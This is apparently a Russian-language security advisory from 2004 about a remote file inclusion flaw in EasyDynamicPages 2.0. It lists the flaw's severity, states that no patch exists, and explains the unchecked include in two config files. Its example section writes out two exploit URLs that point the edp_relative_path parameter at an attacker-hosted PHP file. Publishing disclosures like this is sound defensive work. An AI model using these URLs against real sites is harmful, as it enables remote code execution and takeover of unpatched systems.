| Дата публикации: | 04.01.2004 |
| Всего просмотров: | 958 |
| Опасность: | Высокая |
| Наличие исправления: | Нет |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Компрометация системы |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | EasyDynamicPages 2.x |
| Уязвимые версии: EasyDynamicPages 2.0
Описание: Уязвимость включения файла обнаружена в EasyDynamicPages. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системы на целевой системе. Файлы '/admin/config.php' и '/dynamicpages/fast/config_page.php' включают файлы без проверки включаемых файлов. В результате удаленный пользователь может представить специально обработанный URL, который выполнит произвольный PHP файл, расположенный на удаленной системе. Пример/Эксплоит: http://[target]/admin/config.php/edp_relative_path=http://[attacker]/ http://[target]/dynamicpages/fast/config_page.p hp?do=add_page&du=site&edp_relative_path=http://attacker/ URL производителя: http://software.stoitsov.com Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | include() vuln in EasyDynamicPages v.2.0 |